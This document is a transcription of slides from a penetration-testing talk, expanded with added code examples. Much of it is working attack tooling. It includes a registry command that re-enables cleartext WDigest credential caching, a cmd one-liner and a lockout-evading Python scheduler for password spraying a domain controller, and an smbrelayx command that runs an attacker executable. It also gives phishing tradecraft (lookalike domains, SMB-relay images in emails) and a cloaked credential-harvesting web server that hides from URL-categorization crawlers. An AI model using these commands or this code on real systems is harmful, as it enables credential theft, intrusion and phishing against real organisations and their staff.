AKA Tantric Pentesting
by Laurent Desaulniers
Nsec Challenge Designer
If it is stupid and it works, then it is not stupid *
15 character minimum password policy
No NetBIOS/LLMNR, so no Responder <3
Repeat after me: I AM NOT JAMES BOND
ProxMark/RavenHid is conspicuous
Key Impressioning is hard
Lockpicking can be hard, under pressure
Always keep spare keys for switching
Universal Door Controller *
* Pending approval from the demo gods
Hackers take selfies too…
Client has EAP, well configured clients, and only accepts valid certificates
Simple access point + captive portal
DO NOT use an already existing SSID; create your own.
→ Bypasses most WIPS solutions, which look for rogue APs impersonating the corporate SSID, not for a new one.
With most organisations, you can still win using:
But what happens when all of these are blocked?
If you can run Mimikatz, you are already admin, so you can turn the anti-Mimikatz hardening back off.
Since Windows 8.1 / Server 2012 R2 (and KB2871997 on older versions) WDigest no longer keeps cleartext passwords in LSASS; one registry value re-enables it, and anyone who logs on afterwards (a lock/unlock is enough) has their cleartext password cached again:

```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```

Expect this write to be watched: it is a textbook detection rule.
Password spraying is a very effective technique
Try 1 password for all accounts, then wait out the lockout observation window before the next one.
No PowerShell? No problem! One line of cmd.exe against the domain controller's IPC$ share:

```cmd
REM users.txt: one account per line. pass.txt: the ONE password for this round.
REM Typed at the prompt; inside a .bat file the loop variables become %%n and %%p.
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL
```
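The part the one-liner leaves to you is timing. AD resets badPwdCount only when a whole lockoutObservationWindow has passed since the last failure, so spacing attempts evenly inside the window still locks accounts. The following is an added example (not code from the talk): a spray scheduler that sends at most threshold minus a margin passwords per burst, waits a full window plus slack between bursts, and checks itself against a test double that mimics the DC's counter. The policy values, account names, passwords and the one "real" credential are constructed assumptions.

```python
"""Lockout-aware password spraying scheduler (added example, not code from the talk)."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple


@dataclass
class LockoutPolicy:
    threshold: int        # lockoutThreshold: failures before the account locks
    window: timedelta     # lockoutObservationWindow: badPwdCount resets only when this
                          # much time has passed since the LAST failure


@dataclass
class SimulatedDomain:
    """Test double mirroring AD badPwdCount behaviour, so the plan can be checked offline."""
    policy: LockoutPolicy
    creds: Dict[str, str]                                   # user -> real password (constructed)
    bad_count: Dict[str, int] = field(default_factory=dict)
    last_bad: Dict[str, datetime] = field(default_factory=dict)
    locked: Set[str] = field(default_factory=set)

    def login(self, user: str, password: str, now: datetime) -> bool:
        if user in self.locked:
            return False
        if self.creds.get(user) == password:
            self.bad_count[user] = 0                        # a good logon clears the counter
            return True
        last = self.last_bad.get(user)
        if last is not None and now - last >= self.policy.window:
            self.bad_count[user] = 0                        # window elapsed since last failure
        self.bad_count[user] = self.bad_count.get(user, 0) + 1
        self.last_bad[user] = now
        if self.bad_count[user] >= self.policy.threshold:
            self.locked.add(user)
        return False


def plan_spray(passwords: List[str], policy: LockoutPolicy, start: datetime,
               safety_margin: int = 2,
               slack: timedelta = timedelta(minutes=1)) -> List[Tuple[datetime, str]]:
    """Return (time, password) rounds. A burst holds at most threshold - safety_margin
    passwords; the next burst waits a whole observation window (plus slack) so every
    counter has reset. Spreading rounds evenly inside the window would NOT be safe."""
    per_burst = max(1, policy.threshold - safety_margin)
    rounds = []
    for i, pw in enumerate(passwords):
        burst = i // per_burst
        rounds.append((start + burst * (policy.window + slack), pw))
    return rounds


def run_spray(users, rounds, login) -> Dict[str, str]:
    """Spray each round's single password across every account not yet cracked."""
    found: Dict[str, str] = {}
    for when, pw in rounds:
        for user in users:
            if user not in found and login(user, pw, when):
                found[user] = pw
    return found


# Constructed sample data (hypothetical policy, names and passwords).
POLICY = LockoutPolicy(threshold=5, window=timedelta(minutes=30))
USERS = ["alice", "bob", "carol"]
PASSWORDS = ["Winter2018!", "Password1", "Summer2018!", "Company123", "Welcome1"]
CREDS = {"bob": "Company123"}
START = datetime(2018, 5, 17, 9, 0)


def demo():
    """Planned spray vs. the naive 'every password at once' loop. Returns
    (found credentials, accounts locked by the plan, accounts locked by the naive run)."""
    planned = SimulatedDomain(POLICY, CREDS)
    found = run_spray(USERS, plan_spray(PASSWORDS, POLICY, START), planned.login)
    naive = SimulatedDomain(POLICY, CREDS)
    run_spray(USERS, [(START, pw) for pw in PASSWORDS], naive.login)
    return found, set(planned.locked), set(naive.locked)


if __name__ == "__main__":
    print(demo())
```

Read the real values with `net accounts /domain` before spraying; the simulator only tells you the plan is consistent with the policy you gave it.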
20 character password policy? No problem!
SMB relay is very hard to protect against: the password is never cracked, the NTLM authentication is just forwarded to a host that does not require SMB signing.
Nessus classifies the finding (SMB signing not required) as low.

```shell
./smbrelayx.py -h [TARGET_HOST] -e [My_EVIL_EXE]
```

-h is the host the captured authentication is relayed to (it must not require signing); -e is the executable smbrelayx runs there once the relayed session has admin rights. Requiring SMB signing on every host is the fix.
If you can get tech support to connect to you, you won!
My favourites are:
"My screen's background is asking me for money"
"Why did you install a dancing pig icon telling me to call tech support?"
Once the technician logs on to your box with their support account, you can then:
Invoke-Mimikatz
Freeze the RAM (cold boot the keys out of memory)
SMB relay
Fake UAC prompt
Improve your phishing game
Do NOT use security-related pretexts: people are trained to recognize those as phishing.
Test was supposed to be secret… but suddenly everyone knows about it?
I always include an SMB relay image (an image loaded from a UNC path on my host) in all my phish.
Users are told to forward phishing to tech support, so whoever handles the report opens it and authenticates to my host too.
Using - instead of . works wonders:
stairs-mydomain.com
support-mydomain.com
wwww-mydomain.com
hr-mydomain.com
Always set up valid SPF records. Helps prevent the mail from being categorized as spam.
Make sure that the phishing website is properly categorized by the URL-filtering crawlers before the campaign; an uncategorized domain is often blocked by the proxy.
HINT: redirect all IPs to the original website, except your target's. The crawler sees the real site and categorizes your domain accordingly.
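One way to do that redirect, as an added example that is not code from the talk or from Phishing Frenzy: a small WSGI app that serves the phishing page only to the target's egress ranges and sends everyone else (categorization crawlers, mail-gateway sandboxes, curious analysts) to the same path on the real site, recording who they were. The CIDRs, the real site URL, the page body and the bind address are assumptions.

```python
"""Target-only phishing site (added example, not code from the talk)."""
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple
from wsgiref.simple_server import make_server

# Assumed target egress ranges (documentation TEST-NET prefixes stand in for real ones).
TARGET_NETS = [ip_network("203.0.113.0/24"), ip_network("198.51.100.0/24")]
REAL_SITE = "https://www.example.com/"          # assumed: the site being imitated
PHISH_PAGE = (b"<html><body><form method='post' action='/login'>"
              b"User <input name='u'><br>Password <input name='p' type='password'><br>"
              b"<input type='submit'></form></body></html>")   # placeholder page
NON_TARGET_HITS: List[Tuple[str, str, str]] = []   # (ip, path, user-agent) of everyone redirected


def is_target(client_ip: str) -> bool:
    """True when the client address falls inside one of the target's ranges."""
    try:
        addr = ip_address(client_ip)
    except ValueError:
        return False
    return any(addr in net for net in TARGET_NETS)


def application(environ, start_response):
    # Decide on REMOTE_ADDR, which the server sets. X-Forwarded-For is client-controlled
    # unless a proxy you run strips and rewrites it, so it is deliberately ignored here.
    client = environ.get("REMOTE_ADDR", "")
    path = environ.get("PATH_INFO", "/")
    if is_target(client):
        start_response("200 OK", [("Content-Type", "text/html; charset=utf-8"),
                                  ("Content-Length", str(len(PHISH_PAGE)))])
        return [PHISH_PAGE]
    # Everyone else came looking: crawlers and gateways inspecting the campaign. Keep the list.
    NON_TARGET_HITS.append((client, path, environ.get("HTTP_USER_AGENT", "")))
    start_response("302 Found", [("Location", REAL_SITE + path.lstrip("/")),
                                 ("Content-Length", "0")])
    return [b""]


def handle(environ: Dict[str, str]) -> Tuple[str, Dict[str, str], bytes]:
    """Run one request through the app without a server; returns (status, headers, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(application(environ, start_response))
    return captured["status"], captured["headers"], body


if __name__ == "__main__":
    with make_server("0.0.0.0", 8080, application) as httpd:   # assumed bind address and port
        httpd.serve_forever()
```

The redirected visitors are worth reading back: their source addresses and user agents tell you which crawler or gateway looked at the campaign, and when.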
I use Phishing Frenzy for all of my phishing needs.
I am told GoPhish is very good as well.
Or send something deliberately noisy with a unique Referer:

```
Or '1'='<script>alert(1)>../../../passwd%0a%0d
Referer: VeryLongDomain.com?id=342333
```

If the Referer URL gets crawled, you know that someone is watching the log, and the id tells you which log.
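The canary only pays off if each id is unique and you actually look for it on the canary host. As an added example (not code from the talk): a helper that mints a fresh id per target and records what it marks, plus a scanner for the canary host's access log that reports which planted id was fetched, by whom and with what user agent. The domain is the one on the slide; the ids, labels and log lines are constructed.

```python
"""Canary Referer detection (added example, not code from the talk)."""
import re
import secrets
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

CANARY_HOST = "VeryLongDomain.com"          # canary host from the slide; assumed under our control
PLANTED: Dict[str, str] = {                 # canary id -> where it was planted (constructed)
    "342333": "target web server, injection noise sent 2018-05-17",
}

# Apache/nginx "combined" log format.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


def plant(label: str) -> str:
    """Mint a fresh canary id, remember what it marks, return the Referer value to send."""
    cid = secrets.token_hex(4)
    PLANTED[cid] = label
    return f"http://{CANARY_HOST}/?id={cid}"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """One combined-format line -> dict of fields, or None when it does not parse."""
    m = COMBINED.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def canary_hits(lines, planted: Optional[Dict[str, str]] = None) -> List[Dict[str, str]]:
    """Scan the canary host's access log; return one record per planted id that was fetched."""
    planted = PLANTED if planted is None else planted
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                                        # malformed or non-combined line
        ids = parse_qs(urlsplit(rec["path"]).query).get("id", [])
        for cid in ids:
            if cid in planted:
                hits.append({"canary": cid, "planted_in": planted[cid], "client": rec["ip"],
                             "time": rec["time"], "user_agent": rec["ua"]})
    return hits


# Constructed sample access log: one real hit on the canary, one unrelated id, one junk line.
SAMPLE_LOG = [
    '203.0.113.9 - - [18/May/2018:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [18/May/2018:11:40:17 +0000] "GET /?id=342333 HTTP/1.1" 404 0 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '198.51.100.23 - - [18/May/2018:11:40:18 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '203.0.113.50 - - [18/May/2018:12:00:00 +0000] "GET /?id=1 HTTP/1.1" 404 0 "-" "curl/7.58.0"',
    "not a log line",
]

if __name__ == "__main__":
    for hit in canary_hits(SAMPLE_LOG):
        print(hit)
```

A hit from a desktop browser user agent inside the target's ranges is an analyst reading the log by hand; a hit from a generic fetcher seconds after the request is more likely a SIEM or sandbox following URLs automatically, so keep the source address and user agent next to the id.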